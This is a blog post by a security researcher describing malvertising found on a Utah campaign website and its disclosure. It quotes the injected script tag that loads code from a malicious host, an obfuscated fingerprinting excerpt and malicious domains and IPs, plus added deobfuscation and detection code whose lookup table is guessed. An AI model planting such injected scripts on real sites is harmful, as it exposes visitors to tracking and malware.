
The political election campaign of Tom Sakievich responded quickly to remove “malvertising” malware from their website this past week after I discovered and reported the hack.

Discovering the Malware

On Tuesday June 9, I received my primary ballot in the mail. The Utah County Commissioners primary gives voters the choice between challenger Tom Sakievich and incumbent Nathan Ivie. Before voting, I like to do some research on the candidates such as reading about them in the local news, reviewing their voting record on issues, and visiting their campaign websites.

When I visited the campaign website of Tom Sakievich, multiple security alerts went off. Being a cybersecurity professional, I have several tools always running to help me identify security issues. Two of them notified me of the presence of malicious code on the campaign website.

Upon further inspection, I found on line 678 of the page's source a reference to a script hosted on a third-party server (do not visit it!). The domain is modified slightly below to break automatic hyperlinking:

<script type='text/javascript' src='//rugiomyh2vmr[.]com/66/b5/c8/66b5c86625ce95e4204891b4c167d60d[.]js'></script>

The code’s purpose appears to be an activity called malvertising. Wikipedia describes malvertising as “the use of online advertising to spread malware.” Hackers tend to target reputable websites to place malvertising code. It’s particularly potent because when unsuspecting people visit those trusted websites, the code can track users, display unwanted ads, redirect visitors to other websites, or attempt to download malware onto the user’s device.

It’s unclear how the hackers were able to place the code on the website. However, the nature of this infection points to an automated process, such as a botnet, exploiting a vulnerability, rather than a person at a keyboard manually working their way in.

I’ll summarize the next two sections here for the average citizen because they get pretty technical. The hackers employed techniques that made it difficult to determine the goal of the code, but I identified its general purpose and found it associated with known malvertising systems.

For the less technical reader, I suggest skipping to the Criminal Tunnel Vision section below.

Code Analysis

The code and behavior of the malvertising script were difficult to analyze. The hackers used various tricks to hide the true intention of the source code, a process called code obfuscation. The obfuscation techniques employed are rarely, if ever, used by legitimate code. I was able to peel back the layers to a degree, but given time constraints I could not fully de-obfuscate the code. From what I did see, the code identified the visitor's device type (Android, iPhone, smart TV, etc.) and screen size, used techniques to determine whether the visitor was a bot or a person, and selected what type of actions the script could take.

function detect() {
      var userAgent = navigator[_0x5432("0x35")][_0x5432("0x30")]();
      var data = {
        "webkit" : /webkit/[_0x5432("0x36")](userAgent),
        "mozilla" : /mozilla/[_0x5432("0x36")](userAgent) && !/(compatible|webkit)/["test"](userAgent),
        "chrome" : /chrome/[_0x5432("0x36")](userAgent) || /crios/[_0x5432("0x36")](userAgent),
        "msie" : /msie/[_0x5432("0x36")](userAgent) && !/opera/[_0x5432("0x36")](userAgent),
        "edge" : /edge/[_0x5432("0x36")](userAgent),
        "ie11" : /mozilla/[_0x5432("0x36")](userAgent) && /trident/[_0x5432("0x36")](userAgent) && /rv:11/["test"](userAgent),
        "firefox" : /firefox/[_0x5432("0x36")](userAgent),
        "safari" : /safari/["test"](userAgent) && !(/chrome/[_0x5432("0x36")](userAgent) || /crios/[_0x5432("0x36")](userAgent)),
        "opera" : /opera/[_0x5432("0x36")](userAgent),
        "opr" : /opr/["test"](userAgent),
        "ya" : /yabrowser/["test"](userAgent),
        "fb" : /fbav/[_0x5432("0x36")](userAgent),
        "ucbrowser" : /ubrowser/[_0x5432("0x36")](userAgent) || /ucbrowser/[_0x5432("0x36")](userAgent),
        "android" : /android/i[_0x5432("0x36")](userAgent),
        "puf" : /puffin/i[_0x5432("0x36")](userAgent),
        "ios" : /iphone|ipad|ipod/i["test"](userAgent),
        "ios9" : (/os 9/[_0x5432("0x36")](userAgent) || /os 10/[_0x5432("0x36")](userAgent)) && /like mac os x/["test"](userAgent),
        "ios10" : /os 10/[_0x5432("0x36")](userAgent) && /like mac os x/[_0x5432("0x36")](userAgent),
        "ios11" : /os 11/[_0x5432("0x36")](userAgent) && /like mac os x/[_0x5432("0x36")](userAgent),
        "blackberry" : /blackberry|bb/i["test"](userAgent),
        "winphone" : /windows\sphone/i["test"](userAgent),
        "new_webview" : /Mobile/i["test"](userAgent),
        "isMobile" : /Android|BlackBerry|iPhone|iPad|iPod|Opera\sMini|IEMobile/i[_0x5432("0x36")](userAgent),
        "ucversion" : parseInt((userAgent[_0x5432("0x37")](/.+(?:ubrowser|ucbrowser)[\/: ]([\d.]+)/) || [])[1]),
        "wversion" : parseInt((userAgent[_0x5432("0x37")](/.+(?:windows nt)[\/: ]([\d.]+)/) || [])[1])
      };
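
Added example, not the author's code and not the malware's: the excerpt above hides property names behind calls such as _0x5432("0x36"), a string-array lookup that an obfuscator generates. Peeling back that layer means resolving each key to its string and rewriting bracket access to plain dot access. The lookup table below is an assumption inferred from context (the same lines mix ["test"] with _0x5432("0x36") on sibling regexes), not the recovered table from the sample.

```javascript
// Inferred mapping from the obfuscator's key to the string it stands for.
// ASSUMPTION: reconstructed from context, not extracted from the real script.
const INFERRED_TABLE = {
  "0x30": "toLowerCase",
  "0x35": "userAgent",
  "0x36": "test",
  "0x37": "match",
};

// Replace _0xNNNN("0xHH") with the string literal it resolves to, then turn
// ["identifier"] bracket access into .identifier for readability.
// Keys missing from the table are left untouched so partial tables still help.
function deobfuscate(src, table, fnName = "_0x5432") {
  const call = new RegExp(fnName + '\\("(0x[0-9a-f]+)"\\)', "g");
  const resolved = src.replace(call, (m, key) =>
    key in table ? JSON.stringify(table[key]) : m);
  return resolved.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
}

// Constructed sample lines in the shape of the captured detect() function.
const SAMPLE = [
  'var userAgent = navigator[_0x5432("0x35")][_0x5432("0x30")]();',
  '"chrome" : /chrome/[_0x5432("0x36")](userAgent) || /crios/[_0x5432("0x36")](userAgent),',
  '"ios" : /iphone|ipad|ipod/i["test"](userAgent),',
].join("\n");

// Returns the readable form of the sample, e.g. navigator.userAgent.toLowerCase()
function demo() {
  return deobfuscate(SAMPLE, INFERRED_TABLE);
}
```

With the real table (usually the string array declared at the top of the script), the same rewrite exposes the whole fingerprinting routine.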

Behavior and Reputation Analysis

I could only go so far by just looking at the code, so I turned to examining its behavior when I ran it. This also proved difficult because the hackers employed some clever tricks to prevent the code from loading under certain circumstances. This is important to note because it indicates that additional, undiscovered malicious code runs on the website, likely on the server itself. To decide whether to serve the code to the user's device, the server-side code appears to take into consideration the visitor's IP address, whether the visitor has a cookie from a previous visit, and the type of device used. When I did get the script from rugiomyh2vmr[.]com to load, it downloaded additional scripts from four different domains: Nbf9baurl[.]com, nta1vb6cdlrl[.]com, ie8eamus[.]com, and d24ak3f2b[.]top. These domains all have poor reputations.

The domain rugiomyh2vmr[.]com was registered on April 29, 2020. Newly registered domains in scripts are a classic sign of malicious activity. Hackers use fresh domains because antivirus vendors and web filters identify and block the domains pretty quickly. The cybersecurity company Palo Alto Networks rates this domain “High Risk” and classifies it as “Questionable.” A GeoIP lookup on the IP addresses the domain resolves to points to Virginia. The hosting provider is DataWeb Global Group B.V., based out of the Netherlands.

nta1vb6cdlrl[.]com is hosted on the same servers as rugiomyh2vmr[.]com and was registered on October 24, 2019. It’s a bit older by malware standards, but clearly still functioning. Palo Alto Networks also considers this domain “High Risk.”

Nbf9baurl[.]com is hosted in the Netherlands, a go-to country for hackers to set up their infrastructure due to the country’s strong anti-censorship laws. Palo Alto Networks also considers this domain “High Risk.”

ie8eamus[.]com is hosted behind a service provided by the company Cloudflare. Cloudflare, used by both legitimate and illegitimate organizations, has strong anti-censorship attitudes, making it an ideal service for hackers. The antivirus company Malwarebytes identifies this domain as “malvertising.”

Finally, d24ak3f2b[.]top resolves to an IP in the United States and is considered “High Risk.”

Searching these domains on Google returns results mostly associated with malware analysis, suggesting others have associated these domains with nefarious activities.

The IP addresses hosting rugiomyh2vmr[.]com are also interesting. According to SecurityTrails, there are about 1,780 domains and subdomains observed resolving to 192.243.59.12; 1,514 resolving to 192.243.59.13; and 1,514 resolving to 192.243.59.20. An examination of the domains reveals a strong pattern: most are 12-character names made of seemingly random letters and digits. A sample of these domains on VirusTotal kept turning up “malicious” or “spam.”
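
Added example, not from the original post: a defender-side check that lists every external script host in a page's HTML and flags the ones shaped like the throwaway domains just described (a long registrable label mixing digits into letters, with few vowels). The thresholds are an assumption of this example and give a triage heuristic, not a verdict; hits should be checked against domain age and reputation data as done above.

```javascript
// Collect the hostnames of all external <script src=...> tags in the HTML.
// Defanged hosts written as example[.]com are accepted so pasted IoCs work.
function extractScriptHosts(html) {
  const tag = /<script\b[^>]*\bsrc=['"]?(?:https?:)?\/\/([^/'"\s>]+)/gi;
  const hosts = [];
  let m;
  while ((m = tag.exec(html)) !== null) hosts.push(m[1].toLowerCase());
  return hosts;
}

// ASSUMED heuristic: registrable label of 8+ chars, at least one digit, and
// under 30% vowels. Tuned to the 12-character pattern described in the post.
function looksRandom(host) {
  const parts = host.replace(/\[\.\]/g, ".").split(".");
  const label = parts.length >= 2 ? parts[parts.length - 2] : parts[0];
  const digits = (label.match(/[0-9]/g) || []).length;
  const vowels = (label.match(/[aeiou]/g) || []).length;
  return label.length >= 8 && digits >= 1 && vowels / label.length < 0.3;
}

// Hosts worth a closer look; returned in page order.
function flagSuspiciousScripts(html) {
  return extractScriptHosts(html).filter(looksRandom);
}

// Constructed sample page: an ordinary library include beside an injected tag
// in the shape quoted earlier (domain kept defanged with [.] as in the post).
const SAMPLE_HTML = `<html><body>
<script src="https://cdn.example.com/lib/app.min.js"></script>
<p>Donate today!</p>
<script type='text/javascript' src='//rugiomyh2vmr[.]com/66/b5/c8/66b5c86625ce95e4204891b4c167d60d[.]js'></script>
</body></html>`;
```

Run flagSuspiciousScripts over a saved copy of a site's pages after each deploy and alert on any host that was not in the previous run; an unexpected entry is a cheap early signal of the kind of injection found here.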

If you would like to perform your own analysis, you can download a pcap I took of loading the website with the malware.

Criminal Tunnel Vision

In a quest for efficiency and automation, hackers focus so much on their techniques and own immediate goals that they often fail to realize the value of the target. I believe this is the case here.

Malvertising appears to be the immediate goal of the hackers, but a hacked political campaign’s website can be far more valuable in other hands. Although it is a local election, Russian and Chinese intelligence operations would love to get their hands on the infrastructure of American political figures to monitor communications and spy on visitors. Criminals could see it as an opportunity to blackmail a politician, or to change the link behind the “Donate Today” button to harvest payment information from unsuspecting donors. This hack appears to be pretty mild and low-impact. Thankfully, the people behind it did not have more malevolent objectives.

Notification and Response

On June 10, 2020, I submitted a message through the “Contact Us” page on the website. (I know, it’s ironic that I reported the hacked website via the hacked website.) On June 12, I realized I should report this security incident to the Utah Department of Public Safety’s Statewide Information and Analysis Center (SIAC). Lo and behold, when I logged onto my email, they had already reached out to me 5 minutes prior after seeing my tweets.

After sharing my findings, Utah SIAC coordinated with the Utah Lieutenant Governor’s office to quickly establish a dialogue with the Tom Sakievich campaign and put me in touch with their webmaster. I’m pleased to say they immediately began to remedy the issue and took extensive action to eradicate the malware. Their response in cleaning things up is among the best I have seen.

After establishing contact, I weighed the option of publicizing this information before the campaign could completely resolve the issue. After all, we are in the middle of primary elections, and the website will attract more visitors and potentially put them at risk. I also think voters should have access to this information if they factor cybersecurity into who they vote for. Ultimately I decided to postpone publicizing this information, as it could have attracted additional criminal attention and further increased the risk to visitors.

This was found (somewhat by happenstance) and disclosed as part of the UtahCyberCheck project, where in my spare time I focus on finding and reporting cybersecurity issues of Utah government, education, and nonprofit organizations. For more information about the project, you can read the announcement blog post.
